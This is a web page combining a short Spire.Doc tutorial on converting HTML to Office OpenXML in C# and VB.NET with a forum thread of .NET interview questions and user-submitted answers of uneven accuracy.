Office OpenXML becomes the technology of choice for delivering structured data on the Web, working hand-in-hand with HTML and fully complementing HTML. Consequently, we need to convert HTML to Office OpenXML at some point at work. This article mainly talks about the conversion process through a professional Word .NET library Spire.Doc.
First we need to complete the preparatory work before the procedure:
- Download the Spire.Doc and install it on your machine.
- Add the Spire.Doc.dll files as reference.
- Open bin folder and select the three dll files under .NET 4.0.
- Right click property and select properties in its menu.
- Set the target framework as .NET 4.
- Add Spire.Doc as namespace.
The following steps will show you how to do this with ease:
Step 1: Create a Word document.
[C#]
Document doc = new Document();
Step 2: Load the HTML file.
[C#]
doc.LoadFromFile("Sample.html");
Step 3: Save the HTML as the XML file.
[C#]
doc.SaveToFile("test.xml", FileFormat.Xml);
Here comes to the full C# and VB.NET code
[C#]
static void Main(string[] args) { Document doc = new Document(); doc.LoadFromFile("Sample.html"); doc.SaveToFile("test.xml", FileFormat.Xml); }
[VB.NET]
Shared Sub Main(ByVal args() As String) Dim doc As New Document() doc.LoadFromFile("sample.html") doc.SaveToFile("test.xml", FileFormat.Xml) End Sub
Preview of original HTML file.
Preview of generated Office OpenXML file.
| https://www.e-iceblue.com/Tutorials/Spire.Doc/Spire.Doc-Program-Guide/How-to-Convert-HTML-to-XML-in-C-and-VB.NET.html | CC-MAIN-2020-29 | refinedweb | 234 | 61.22 |
Python: I need to show file modification times in the "1 day ago", "two hours ago", format.
Is there something ready to do that? It should be in English.
Yes, there is. Or, write your own and tailor it to your needs.
The function (as the blog author deleted it).
def pretty_date(time=False): """ Get a datetime object or a int() Epoch timestamp and return a pretty string like 'an hour ago', 'Yesterday', '3 months ago', 'just now', etc """ from datetime import datetime now = datetime.now() if type(time) is int: diff = now - datetime.fromtimestamp(time) elif isinstance(time,datetime): diff = now - time elif not time: diff = now - now second_diff = diff.seconds day_diff = diff.days if day_diff < 0: return '' if day_diff == 0: if second_diff < 10: return "just now" if second_diff < 60: return str(second_diff) + " seconds ago" if second_diff < 120: return "a minute ago" if second_diff < 3600: return str(second_diff / 60) + " minutes ago" if second_diff < 7200: return "an hour ago" if second_diff < 86400: return str(second_diff / 3600) + " hours ago" if day_diff == 1: return "Yesterday" if day_diff < 7: return str(day_diff) + " days ago" if day_diff < 31: return str(day_diff / 7) + " weeks ago" if day_diff < 365: return str(day_diff / 30) + " months ago" return str(day_diff / 365) + " years ago" | https://codedump.io/share/ZLR4JL3ouDTC/1/user-friendly-time-format-in-python | CC-MAIN-2017-39 | refinedweb | 205 | 62.58 |
Accessing and rendering shapes
A shape is a dynamic data model. The purpose of a shape is to replace the static view model of ASP.NET MVC by using a model that can be updated at run timethat is, by using a dynamic shape. You can think of shapes as the blobs of data that get handed to templates for rendering.
This article introduces the concept of shapes and explains how to work with them. It's intended for module and theme developers who have at least a basic understanding of Orchard modules. For information about creating modules, see the Getting Started with Modules course. For information about dynamic objects, see Creating and Using Dynamic Objects.
Introducing Shapes
Shapes are dynamic data models that use shape templates to make the data visible to the user in the way you want. Shape templates are fragments of markup for rendering shapes. Examples of shapes include menus, menu items, content items, documents, and messages.
A shape is a data model object that derives from the
Orchard.DisplayManagement.Shapes.Shape class.
The
Shape class is never instantiated. Instead, shapes are created at run time by a shape factory.
The default shape factory is
Orchard.DisplayManagement.Implementation.DefaultShapeFactory.
The shapes created by the shape factory are dynamic objects.
Note
Dynamic objects are new to the .NET Framework 4. As a dynamic object, a shape exposes its members at run time instead of at compile time. By contrast, an ASP.NET MVC model object is a static object that's defined at compile time.Dynamic objects are new to the .NET Framework 4. As a dynamic object, a shape exposes its members at run time instead of at compile time. By contrast, an ASP.NET MVC model object is a static object that's defined at compile time.
Information about the shape is contained in the
ShapeMetadata property of the shape itself.
This information includes the shape's type, display type, position, prefix, wrappers, alternates,
child content, and a
WasExecuted Boolean value.
You can access the shape's metadata as shown in the following example:
var shapeType = shapeName.Metadata.Type;
After the shape object is created, the shape is rendered with the help of a shape template.
A shape template is a piece of HTML markup (partial view) that is responsible for displaying the shape.
Alternatively, you can use a shape attribute (
Orchard.DisplayManagement.ShapeAttribute)
that enables you to write code that creates and displays the shape without using a template.
Creating Shapes
For module developers, the most common need for shapes is to transport data from a driver to a template for rendering.
A driver derives from the
Orchard.ContentManagement.Drivers.ContentPartDriver class
and typically overrides that class's
Display and
Editor methods.
The
Display and
Editor methods return a
ContentShapeResult object, which is analogous to
the
ActionResult object returned by action methods in ASP.NET MVC.
The
ContentShape method helps you create the shape and return it in a
ContentShapeResult object.
Although the
ContentShape method is overloaded, the most typical use is to pass it two
parametersthe shape type and a dynamic function expression that defines the shape.
The shape type names the shape and binds the shape to the template that will be used to render it.
The naming conventions for shape types are discussed later in
Naming Shapes and Templates.
The function expression can be described best by using an example.
The following example shows a driver's
Display method that returns a shape result,
which will be used to display a
Map part.
protected override DriverResult Display( MapPart part, string displayType, dynamic shapeHelper) { return ContentShape("Parts_Map", () => shapeHelper.Parts_Map( Longitude: part.Longitude, Latitude: part.Latitude)); }
The expression uses a dynamic object (
shapeHelper) to define a
Parts_Map shape and its attributes.
The expression adds a
Longitude property to the shape and sets it equal to the part's
Longitude property.
The expression also adds a
Latitude property to the shape and sets it equal to the part's
Latitude property.
The
ContentShape method creates the results object that is returned by the
Display method.
The following example shows the entire driver class that sends a shape result to a template either
to be displayed or edited in a
Map part. The
Display method is used to display the map.
The
Editor method marked "GET" is used to display the shape result in editing view for user input.
The
Editor method marked "POST" is used to redisplay the editor view using the values provided by the user.
These methods use different overloads of the
Editor method.
using Maps.Models; using Orchard.ContentManagement; using Orchard.ContentManagement.Drivers; namespace Maps.Drivers { public class MapPartDriver : ContentPartDriver<MapPart> { protected override DriverResult Display( MapPart part, string displayType, dynamic shapeHelper) { return ContentShape("Parts_Map", () => shapeHelper.Parts_Map( Longitude: part.Longitude, Latitude: part.Latitude)); } //GET protected override DriverResult Editor( MapPart part, dynamic shapeHelper) { return ContentShape("Parts_Map_Edit", () => shapeHelper.EditorTemplate( TemplateName: "Parts/Map", Model: part)); } //POST protected override DriverResult Editor( MapPart part, IUpdateModel updater, dynamic shapeHelper) { updater.TryUpdateModel(part, Prefix, null, null); return Editor(part, shapeHelper); } } }
The
Editor method marked "GET" uses the
ContentShape method to create a shape for an editor template.
In this case, the type name is
Parts_Map_Edit and the
shapeHelper object creates an
EditorTemplate shape.
This is a special shape that has a
TemplateName property and a
Model property.
The
TemplateName property takes a partial path to the template.
In this case,
"Parts/Map" causes Orchard to look for a template in your module at the following path:
Views/EditorTemplates/Parts/Map.cshtml
The
Model property takes the name of the part's model file, but without the file-name extension.
Naming Shapes and Templates
As noted, the name given to a shape type binds the shape to the template that will be used to render the shape.
For example, suppose you create a part named
Map that displays a map for the specified longitude and latitude.
The name of the shape type might be
Parts_Map. By convention, all part shapes begin with
Parts_ followed by the name of the part (in this case
Map). Given this name (
Parts_Map), Orchard looks for a template in your module at the following path:
views/parts/Map.cshtml
The following table summarizes the conventions that are used to name shape types and templates.
You should put your templates in the project according to the following rules:
- Content item shape templates are in the views/items folder.
Parts_shape templates are in the views/parts folder.
Fields_shape templates are in the views/fields folder.
- The
EditorTemplateshape templates are in the views/EditorTemplates/
templatename folder.
For example, an
EditorTemplatewith a template name of Parts/Routable.RoutePart has its template at views/EditorTemplates/Parts/Routable.RoutePart.cshtml.
- All other shape templates are in the views folder.
Note
The template extension can be any extension supported by an active view engine, such as .cshtml, .vbhtml, or .ascx.The template extension can be any extension supported by an active view engine, such as .cshtml, .vbhtml, or .ascx.
From Template File Name to Shape Name
More generally, the rules to map from a template file name to the corresponding shape name are the following:
- Dot (.) and backslash () change to underscore (). Note that this does not mean that an _example.cshtml file in a myviews subdirectory of Views is equivalent to a myviewsexample.chtml_ file in Views. The shape templates must still be in the expected directory (see above).
- Hyphen (-) changes to a double underscore (__).
For example, Views/Hello.World.cshtml will be used to render a shape named
Hello_World,
and Views/Hello.World-85.cshtml will be used to render a shape named
Hello_World__85.
Alternate Shape Rendering
As noted, an HTML widget in the
AsideSecond zone (for example) could be rendered
by a widget.cshtml template, by a widget-htmlwidget.cshtml template,
or by a widget-asidesecond.cshtml if they exist in the current theme.
When various possibilities exist to render the same content,
these are referred to as alternates of the shape,
and they enable rich template overriding scenarios.
Alternates form a group that corresponds to the same shape if they differ only by a double-underscore suffix.
For example,
Hello_World,
Hello_World__85, and
Hello_World__DarkBlue are an alternate group
for a
Hello_World shape.
Hello_World_Summary, conversely, does not belong to that group
and would correspond to a
Hello_World_Shape shape, not to a
Hello_World shape.
(Notice the difference between "__" and "_".)
Which Alternate Will Be Rendered?
Even if it has alternates, a shape is always created with the base name, such as
Hello_World.
Alternates give additional template name options to the theme developer beyond the default
(such as hello.world.cshtml).
The system will choose the most specialized template available among the alternates,
so hello.world-orange.cshtml will be preferred to hello.world.cshtml if it exists.
Built-In Content Item Alternates
The table above shows possible template names for content items.
It should now be clear that the shape name is built from
Content
and the display type (for example
Content_Summary).
The system also automatically adds the content type and the content ID as alternates
(for example
Content_Summary__Page and
Content_Summary__42).
For more information about how to use alternates, see Alternates.
Rendering Shapes Using Templates
A shape template is a fragment of markup that is used to render the shape. The default view engine in Orchard is the Razor view engine. Therefore, shape templates use Razor syntax by default. For an introduction to Razor syntax, see Template File Syntax Guide.
The following example shows a template for displaying a
Map part as an image.
<img alt="Location" border="1" src="? &zoom=14 &size=256x256 &maptype=satellite&markers=color:blue|@Model.Latitude,@Model.Longitude &sensor=false" />
This example shows an
img element in which the
src attribute contains a URL
and a set of parameters passed as query-string values.
In this query string,
@Model represents the shape that was passed into the template.
Therefore,
@Model.Latitude is the
Latitude property of the shape,
and
@Model.Longitude is the
Longitude property of the shape.
The following example shows the template for the editor. This template enables the user to enter values for the latitude and longitude.
@model Maps.Models.MapPart <fieldset> <legend>Map Fields</legend> <div class="editor-label"> @Html.LabelFor(model => model.Longitude) </div> <div class="editor-field"> @Html.TextBoxFor(model => model.Latitude) @Html.ValidationMessageFor(model => model.Latitude) </div> <div class="editor-label"> @Html.LabelFor(model => model.Longitude) </div> <div class="editor-field"> @Html.TextBoxFor(model => model.Longitude) @Html.ValidationMessageFor(model => model.Longitude) </div> </fieldset>
The
@Html.LabelFor expressions create labels using the name of the shape properties.
The
@Html.TextBoxFor expressions create text boxes where users enter values for the shape properties.
The
@Html.ValidationMessageFor expressions create messages that are displayed if users enter an invalid value.
Wrappers
Wrappers let you customize the rendering of a shape by adding markup around the shape.
For example, Document.cshtml is a wrapper for the
Layout shape, because it specifies
the markup code that surrounds the
Layout shape.
For more information about the relationship between
Document and
Layout,
see Template File Syntax Guide.
Typically, you add a wrapper file to the Views folder of your theme.
For example, to add a wrapper for
Widget, you add a Widget.Wrapper.cshtml file to
the Views folder of your theme.
If you enable the Shape Tracing feature, you'll see the available wrapper names for a shape.
You can also specify a wrapper in the placement.info file.
For more information about how to specify a wrapper,
see Understanding the placement.info File.
Creating a Shape Method
Another way to create and render a shape is to create a method that both defines and renders the shape.
The method must be marked with the
Shape attribute (the
Orchard.DisplayManagement.ShapeAttribute class).
The method returns an
IHtmlString object instead of using a template;
the returned object contains the markup that renders the shape.
The following example shows the
DateTimeRelative shape.
This shape takes a
DateTime value in the past and returns a string that relates the value to the current time.
public class DateTimeShapes : IDependency { private readonly IClock _clock; public DateTimeShapes(IClock clock) { _clock = clock; T = NullLocalizer.Instance; } public Localizer T { get; set; } [Shape] public IHtmlString DateTimeRelative(HtmlHelper Html, DateTime dateTimeUtc) { var time = _clock.UtcNow - dateTimeUtc; if (time.TotalDays > 7) return Html.DateTime(dateTimeUtc, T("'on' MMM d yyyy 'at' h:mm tt")); if (time.TotalHours > 24) return T.Plural("1 day ago", "{0} days ago", time.Days); if (time.TotalMinutes > 60) return T.Plural("1 hour ago", "{0} hours ago", time.Hours); if (time.TotalSeconds > 60) return T.Plural("1 minute ago", "{0} minutes ago", time.Minutes); if (time.TotalSeconds > 10) return T.Plural("1 second ago", "{0} seconds ago", time.Seconds); return T("a moment ago"); } } | http://docs.orchardproject.net/Documentation/Accessing-and-rendering-shapes?NoRedirect=1 | CC-MAIN-2016-18 | refinedweb | 2,133 | 51.04 |
panda3d.core.ModelFlattenRequest¶
from panda3d.core import ModelFlattenRequest
- class
ModelFlattenRequest¶
This class object manages a single asynchronous request to flatten a model. The model will be duplicated and flattened in a sub-thread (if threading is available), without affecting the original model; and when the result is done it may be retrieved from this object.
Inheritance diagram
__init__(orig: PandaNode) → None¶
Create a new ModelFlattenRequest, and add it to the loader via load_async(), to begin an asynchronous load.
getModel() → PandaNode¶
Returns the flattened copy of the model. It is an error to call this unless done() returns true.
Deprecated: Use result() instead.
- Return type
-
isReady() → bool¶
Returns true if this request has completed, false if it is still pending. When this returns true, you may retrieve the model loaded by calling result(). Equivalent to
req.done() and not req.cancelled().
See
done(). | https://docs.panda3d.org/1.10/python/reference/panda3d.core.ModelFlattenRequest | CC-MAIN-2020-29 | refinedweb | 142 | 50.53 |
Spring Boot Hello World Tutorial
Let’s build a Hello World web application using Spring Boot. We will go through step by step to learn how to do this.
Generate A Spring Boot Project
There are multiple ways to setup a Spring Boot application. However, the easiest way to do it via Spring Initializer. Open the Spring Initializer page and add the Spring Web as dependency. While you are at it, Fill out the project metadata as per your need.
After filling the form, Hit Ctrl+Enter or click Generate to download the project template as ZIP file.
Import Project in IDE
Extract the downloaded project somewhere in your computer. After that, open Intellij IDEA -> File -> New -> Project from Existing Sources -> Select the directory where you extracted the hello world project.
After selecting, Choose Import Project from External Model -> Maven -> Finish.
You can also use Open-> Select directory -> Ok to directly load any Maven project in Intellij
For other IDEs like eclipse, VSCode etc, You can follow similar steps because a spring boot project is still a maven project.
Hello World Controller
Further, We need to add a controller that will listen and serve Hello World as response. To do that, add the below Controller to your application under the package
com.springhow.examples.helloworld.controllers.
Code language: JavaScript (javascript)Code language: JavaScript (javascript)
@RestController public class HelloWorldController { @RequestMapping("/") String helloWorld() { return "Hello World!"; } }
Spring Boot Hello World Application
To run the Spring boot project, Simply call
mvn spring-boot:run. This maven command utilizes Spring Boot Maven plugin to build and run the spring boot project.
You can also start the application from IDE by simply starting the main class
HelloWorldSpringBootApplication.
Subsequently, Open the browser and view the URL. It returns the “Hello World!” String which was hardcoded in the controller.
Summary
In Short, we learned how to create and run a Spring Boot Hello World web application. The following articles may be the right path to learning Spring Boot. | https://springhow.com/spring-boot-hello-world-application/ | CC-MAIN-2021-31 | refinedweb | 331 | 65.12 |
Fonts
React-pdf is shipped with a
Font module that enables to load fonts from different sources, handle how words are wrapped and define an emoji source to embed these glyphs on your document.
Fonts really make the difference when it comes on styling a document. For obvious reasons, react-pdf cannot ship a wide amount of them. That why we provide an easy way to load your custom fonts from many different sources via the
register method vey easily.
import { Font } from '@react-pdf/renderer' Font.register(source, { family: 'FamilyName' });
source
Specifies the source of the font. This can either be a valid URL, or an absolute path if you're using react-pdf on Node.
family
Name to which the font will be referenced on styles definition. Can be any unique valid string
import { StyleSheet, Font } from '@react-pdf/renderer' // Register font Font.register(source, { family: 'Roboto' }); // Reference font const styles = StyleSheet.create({ title: { fontFamily: 'Roboto' } })
registerHyphenationCallback
Enables you to have fine-grained control over how words break, passing your own callback and handle all that logic for yourself:
import { Font } from '@react-pdf/renderer' const hyphenationCallback = (words) => { // Iterate through words } Font.registerHyphenationCallback(hyphenationCallback);
Disabling hyphenation
You can easily disable word hyphenation by just returning all words as they are passed to hte hyphenation callback
Font.registerHyphenationCallback(words => ( words.map(word => [word]) ));
registerEmojiSource
PDF documents do not support color emoji fonts. This is a bummer for the ones out there who love their expressiveness and simplicity. The only way of rendering this glyphs on a PDF document, is by embedding them as images.
React-pdf makes this task simple by enabling you to use a CDN from where to download emoji images. All you have to do is setup a valid URL (we recommend using Twemoji for this task), and react-pdf will take care of the rest:
import { Font } from '@react-pdf/renderer' Font.registerEmojiSource({ format: 'png', url: '', });
Protip: react-pdf will need a internet connection to download emoji's images at render time, so bare that in mind when choosing to use this API
| https://react-pdf.org/fonts | CC-MAIN-2018-47 | refinedweb | 348 | 53.51 |
I wrote “what’s up with containers: Docker and rkt” a while ago. Since then I have learned a few new things about containers! We’re going to talk about running containers in production, not on your laptop for development, since I’m trying to understand how that works in September 2016. It’s worth noting that all this stuff is moving pretty fast right now.
The concerns when you run containers in production are pretty different from running it on a laptop – I very happily use Docker on my laptop and I have no real concerns about it because I don’t care much if processes on my laptop crash like 0.5% of the time, and I haven’t seen any problems.
Here are the things I’ve learned so far. I learned many of these things with @grepory who is the best. Basically I want to talk about what some of the things you need to think about are if you want to run containers, and what is involved in “just running a container” :)
At the end I’m going to come back to a short discussion of Docker’s current architecture. (tl;dr: @jpetazzo wrote a really awesome gist)
Docker is too complicated! I just want to run a container
So, I saw this image online! (comes from this article)
And I thought “that rkt diagram looks way easier to operate in production! That’s what I want!”
Okay, sure! No problem. I can use
runC! Go to runc.io, follow the
direction, make a
config.json file, extract my container into a tarball, and now I can
run my container with a single command. Awesome.
Actually I want to run 50 containers on the same machine.
Oh, okay, that’s pretty different. So – let’s say all my 50 containers share a bunch of files (shared libraries like libc, Ruby gems, a base operating system, etc.). It would be nice if I could load all those files into memory just once, instead of 3 times.
If I did this I could save disk space on my machine (by just storing the files once), but more importantly, I could save memory!
If I’m running 50 containers I don’t want to have 50 copies of all my shared libraries in memory. That’s why we invented dynamic linking!
If you’re running just 2-3 containers, maybe you don’t care about a little bit of copying. That’s for you to decide!
It turns out that the way Docker solves this is with “overlay filesystems” or “graphdrivers”. (why are they called graphdrivers? Maybe because different layers depend on each other like in a directed graph?) These let you stack filesystems – you start with a base filesystem (like Ubuntu 14.04) and then you can start adding more files on top of it one step at a time.
Filesystem overlays need some Linux kernel support to work – you need to use a filesystem that supports them. The Brutally Honest Guide to Docker Graphdrivers by the fantastic Jessie Frazelle has a quick overview. overlayfs seems to be the most normal option.
At this point, I was running Ubuntu 14.04. 14.04 runs a 3.13 Linux kernel! But to use overlayfs, you need a 3.18 kernel! So you need to upgrade your kernel. That’s fine.
Back to
runC.
runC does not support overlay filesystems. This is an intentional design choice – it lets runC run on older kernels, and lets you separate out the concerns. But it’s not super obvious right now how to use runC with overlay filesystems. So what do I do?
I’m going to use rkt to get overlay filesystem support
So! I’ve decided I want overlay filesystem support, and gotten a Linux kernel newer than 3.18. Awesome. Let’s try rkt, like in that diagram! It lives at coreos.com/rkt/
If you download
rkt and run
rkt run docker://my-docker-registry/container, This
totally works. Two small things I learned:
--net=host will let you run in the host network namespace
Network namespaces are one of the most important things in container land. But if you want to run containers using as few new things as possible, you can start out by just running your containers as normal programs that run on normal ports, like any other program on your computer. Cool
--exec=/my/cool/program lets you set which command you want rkt to execute inside the image
systemd: rkt will run a program called
systemd-nspawn as the init (PID 1) process inside your container. This is because it can be bad to run an arbitrary process as PID 1 – your process isn’t expecting it and will might react badly. It also run some systemd-journal process? I don’t know what that’s for yet.
The systemd journal process might act as a syslog for your container, so that programs sending logs through syslog end up actually sending them somewhere.
There is quite a lot more to know about rkt but I don’t know most of it yet.
I’d like to trust that the code I’m running is actually my code
So, security is important. Let’s say I have a container registry. I’d like to make sure that the code I’m running from that registry is actually trusted code that I built.
Docker lets you sign images to verify where they came from. rkt lets you run Docker images. rkt does not let you check signatures from Docker images though! This is bad.
You can fix this by setting up your own rkt registry. Or maybe other things! I’m going to leave that here. At this point you probably have to stop using Docker containers though and convert them to a different format.
Supervising my containers (and let’s talk about Docker again)
So, I have this Cool Container System, and I can run containers with overlayfs and I can trust the code I’m running. What now?
Let’s go back to Docker for a bit. So far I’ve been a bit dismissive about Docker, and I’d like to look at its current direction a little more seriously. Jérôme Petazzoni wrote an extremely informative and helpful discussion about how Docker got to its architecture today in this gist. He says (which I think is super true) that Docker’s approach to date has done a huge amount to drive container adoption and let us try out different approaches today.
The end of that gist is a really good starting point for talking about how “start new containers” should work.
Jérôme very correctly says that if you’re going to run containers, you need a way to tell boxes which containers to run, and supervise and restart containers when they die. You could supervise them with daemontools, supervisord, upstart, or systemd, or something else!
“Tell boxes which containers to run” is another nontrivial problem and I’m not going to talk about it at all here. So, back to supervision.
Let’s say you use systemd. Then that’ll look like (from the diagram I posted at the top):
- systemd -+- rkt -+- process of container X | \- other process of container X +- rkt --- process of container Y \- rkt --- process of container Z
I don’t know anything about systemd, but it’s pretty straightforward to tell daemontools “hey, here’s a new process to start running, it’s going to run a container”. Then daemontools will restart that container process if it crashes. So this is basically fine.
My understanding of the problem with Docker in production historically is that – the process that is responsible for this core functionality of process supervision was the Docker engine, but it also had a lot of other features that you don’t necessarily want running in production.
The way Docker seems to be going in the future is something like: (this diagram is from jpetazzo’s gist above)
- init - containerd -+- shim for container X -+- process of container X | \- other process of container X +- shim for container Y --- process of container Y \- shim for container Z --- process of container Z
where containerd is a separate tool, and the Docker engine talks to containerd but isn’t as heavily coupled to it. Right now containerd’s website says it’s alpha software, but they also say on their website that it’s used in current versions of Docker, so it’s not totally obvious what the state is right now.
the OCI standard
We talked about how
runC can run containers just fine, but cannot do overlay filesystems or fetch + validate containers from a registry. I would be remiss if I didn’t mention the OCID project that @grepory told me about last week, which aims to do those as separate components instead of in an integrated system like Docker.
Here’s the article: Red Hat, Google Engineers Work on a Way for Kubernetes to Run Containers Without Docker .
Today there’s skopeo which lets you fetch and validate images from Docker registries
what we learned
here’s the tl;dr:
- you can run Docker containers without Docker
- runC can run containers… but it doesn’t have overlayfs
- but overlay filesystems are important!
- rkt has overlay filesystem support.
- you need to start & supervise the containers! You can use any regular process supervisor to do that.
- also you need to tell your computers which containers to run
- software around the OCI standard is evolving but it’s not there yet
As far as I can tell running containers without using Docker or Kubernetes or anything is totally possible today, but no matter what tools you use it’s definitely not as simple as “just run a container”. Either way going through all these steps helps me understand what the actual components of running a container are and what all these different pieces of software are trying to do.
This landscape is pretty confusing but I think it’s not impossible to understand! There are only a finite number of different pieces of software to figure out the role of :)
If you want to see more about running containers from scratch, see Cgroups, namespaces, and beyond: what are containers made from? by jpetazzo. There’s a live demo of how to run a container with 0 tools (no docker, no rkt, no runC) at this point in the video which is super super interesting.
Thanks to Jérôme Petazzoni for answering many questions and to Kamal Marhubi for reading this. | https://jvns.ca/blog/2016/10/02/i-just-want-to-run-a-container/ | CC-MAIN-2017-09 | refinedweb | 1,769 | 70.94 |
On Mar 7, 8:47 pm, Raymond Hettinger <pyt... at rcn.com> wrote: > The existing groupby() itertool works great when every element in a > group has the same key, but it is not so handy when groups are > determined by boundary conditions. > > For edge-triggered events, we need to convert a boundary-event > predicate to groupby-style key function. The code below encapsulates > that process in a new itertool called split_on(). > > Would love you guys to experiment with it for a bit and confirm that > you find it useful. Suggestions are welcome. > > Raymond > > ----------------------------------------- > > from itertools import groupby > > def split_on(iterable, event, start=True): > 'Split iterable on event boundaries (either start events or stop > events).' > # split_on('X1X23X456X', 'X'.__eq__, True) --> X1 X23 X456 X > # split_on('X1X23X456X', 'X'.__eq__, False) --> X 1X 23X 456X > def transition_counter(x, start=start, cnt=[0]): > before = cnt[0] > if event(x): > cnt[0] += 1 > after = cnt[0] > return after if start else before > return (g for k, g in groupby(iterable, transition_counter)) > > if __name__ == '__main__': > for start in True, False: > for g in split_on('X1X23X456X', 'X'.__eq__, start): > print list(g) > print > > from pprint import pprint > email = open('email.txt') > for mime_section in split_on(email, boundary.__eq__): > pprint(list(mime_section, 1, None)) > print '= = ' * 30 I've found this type of splitting quite useful when grouping sections of a text file. I used the groupby function directly in the file, when i would have rather used something like this. However, I wonder if it would be helpful to break that function into two instead of having the "start" flag. The flag feels odd to me (maybe it's the name?), and the documentation might have a better feel to it, coming from a newcomer's perspective. Also, it would be cool if the function took keywords; I wonder why most of the other functions in the itertools module don't take keywords. I wouldn't split out the keys separately from the groups. But the idea of a flag to exclude the keys sounds interesting to me. Thank you for giving me the opportunity to use the nonlocal keyword for the first time since trying out Python 3.0. I hope this is an appropriate usage: def split_on(iterable, key=bool, start=True): 'Split iterable on boundaries (either start events or stop events).' # split_on('X1X23X456X', 'X'.__eq__, True) --> X1 X23 X456 X # split_on('X1X23X456X', 'X'.__eq__, False) --> X 1X 23X 456X flag = 0 def event_marker(x, start_flag=start): nonlocal flag, key before = flag if key(x): flag += 1 after = flag return after if start_flag else before return (g for k, g in it.groupby(iterable, key=event_marker)) | https://mail.python.org/pipermail/python-list/2009-March/528075.html | CC-MAIN-2017-17 | refinedweb | 440 | 71.04 |
What is CNN in .net
Hemima
- Feb 21st, 2012
It is the object of SqlConnection class we can provide any naming convention according to our interest
abhibmc
- Dec 8th, 2011
This seems naming convention, we can also use con with database name prefix from which we are seeking connection
What is the difference between ASP.Net and ASP
nirdesh gurjar
- Oct 10th, 2011
Difference between ASP and ASP.NET ASP.NET: ASP.Net web forms have a code behind file which contains all event handling code. ASP.Net web forms inherit the class written in code behind. ASP.Net web f...
Ravi kumar
- Jul 12th, 2011
Asp.net is a next of Asp but it's not a upgraded version of Asp. Asp is a interpreted language based on a scripting language like jscripts or vbscript.Asp limited development and debugging tools avail...
Comparison between two strings
Write a program to read two strings from the keyboard using readline statement and compare them ignoring the case?
Simon
- Jul 13th, 2011
Here is the answer: "csharp using System; namespace ConsoleApplication1 { class Program { static void Main(string[] args) { Console.Write(...
What is the concept of partial class in .net2.0?
Pradeep Srini
- May 24th, 2011
Partial class is to split the class into multiple files
Rajesh Bathala
- Jun 13th, 2007
Partial class allows developers to split a class into multiple files.ex:public partial class A{ A() { /...
Server Crash
What will happen to sessions when a server crash?
vidyajnath
- Jun 23rd, 2010
If session state service is used for session state maintainenece, then even if the server crashes, the session state will not be lost as it is not running in the same process as ASP.NET. but if in process mode is used, then the session info will be lost.
jyotsana_rani2005
- Mar 29th, 2010
A crash or (system crash) in computing is a condition where a program (either an application or part of the operating syatem) stops performing its expected function and also stops responding to othe...
What is Code Access Security (CAS)?
vidyajnath
- Jun 23rd, 2010
Code access security (CAS) is a new feature provided by the .NET Common Language Runtime. CAS is a security model that lets you grant or deny execution permissions to an assembly according to its &quo...
suresh sm
- Sep 17th, 2005
Identity permissions control code access from one assembly to another. You can use identity permissions, which are a subset of code access permissions, either declaratively or imperatively
Bind GridView Column
How will you bind gridview particular column in datatable using windows application?
jsubha2009
- Jun 15th, 2010
Hope we can bind a particular column in a GridView by writing the code for Connection and DataAdapters in Sql or Oledb Connection and then adding the code,GridView1.DataSource=ds.Tables[0].DefaultView;GridView1.Columns[1].DataBind();Try whether it works.
How does IDE identify about a property/method of an object when a (dot, Auto complete) e.g variablename.ToString();
jsubha2009
- Jun 12th, 2010
IDE enables the property or method to be completed through Intelli Sense. It knows the classes like Forms, Buttons and their appropriate properties and methods. This it displays...
Aldo John
- Sep 5th, 2008
Dear friend, Reflection is all about reading metadata from assemblies. And this metadata is generated only while compiling. IDE's intellisense works fine even before any compilation...How it is wo...
1). what is view stae? what are the pros and cons of using view stae?2). what is .Net remoting?3).please write an example of declaring a function as web services?4). what is web services?
jsubha2009
- Jun 12th, 2010
View State is used to maintain the values of Controls in a particular webpage during its subsecutive postbacks in the same page. It is generally stored in the Hidden field control. It...
rk51131
- Nov 15th, 2009
A ViewState has the details or values of the control in encrypted format. This encrypted details are passed to and fro between the requests to server and hence help in retaining the state of the contr...
How add additional property in Workflow Activity in .Net?
jsubha2009
- Jun 12th, 2010
We can generate additional properties for the activities in a Workflow by using the property definitions with get and set procedures.We can add a property to a class only if the class is inherited or extended and cannot be an existing class in System namespace.
Pandian S
- Mar 3rd, 2007
Hi,In .Net Windows Application, Using IExtenderProvider interface we can extend properties to existing components/controls in the container.
In .NET Compact Framework, can I free memory explicitly without waiting for garbage collector to free the memory?
jsubha2009
- Jun 11th, 2010
You can also explicitly free the object from memory using the assignment statement like,Class1 obj=new Class1();obj=null;
MagikMan74
- Jan 27th, 2010
Calling the garbage collector does nothing but let the garbage collector know you're ready for it to run. There is no way of forcing it to start as it runs on its own schedule. .Dispose() and == null are the only ways to truly free up resources.
1).please write an example of implicitly converting an object to string?2). please write an example explicitly converting an object to string?3).please write an example of getting around up value "55.555"
jsubha2009
- Jun 11th, 2010
Objects cannot be implicitly converted to strings.The converting datatype must be similar and within the range of the to be converted data type and Only certain datatypes can be converted easily impli...
Yogesh Rathod
- Jan 11th, 2007
Class Foo{ string val;//Allow Implicit conversion from Foo string to object. public static implicit operator Foo(int args) { Foo foo1 = new Foo(); foo1.val = args; re...
What is Abstraction?
vasudora
- May 28th, 2010
Abstraction is nothing but hiding the complexity from an end user.There is no need for end user to know about the internal complexity For Ex:- To ride a car what one has to know is how to move th...
peddakumar
- Jan 18th, 2010
Hiding of unnecessary data
How does .Net supports HASH MAPPING?
saranbvn
- Mar 29th, 2010
Hash map is similar to hash table but it will allows null values as keys and objects.Hashmap is not synchronized one where as hashtable is synchronized. We use hash map when the data is of like key pair values. ...
If you want to execute a SQL Script while deploying your application where will you do that in deployment project
gudise.chandu1155
- Feb 3rd, 2010
.Net command prompt
Jenpo
- Nov 7th, 2006
SQL query Analyzer.
Which command is used to keep a constraint into a datacolumnor, how to keep a constraint into datacolumn
daddycool111
- Jan 26th, 2010
This has to be done at the Dataset level, setting System.Data.DataSet.EnforceConstraints = true;
kspc84
- Nov 2nd, 2009
Using Trigger command.
Creating list of objects
Which is better one to follow1.Creating object every time passing values as a parameters to constructor and add to the listor2.Create it once i.e, default constructorand assign values to properties and add it to the list
chaugule_p
- Jan 20th, 2010
It is a scenario based decision the architecture of the application should take. Any parameters which are required for that object to perform minimal Operations, can be added to the default constructo...
v_n_r
- Dec 23rd, 2009
If the values are constant and known then, Create object once i.e, default constructor and assign values to properties and add it to the list.If the values are changing or the values are given at the ...
Define class, module and access specifiers.
mayankbhatnagar
- Jan 5th, 2010
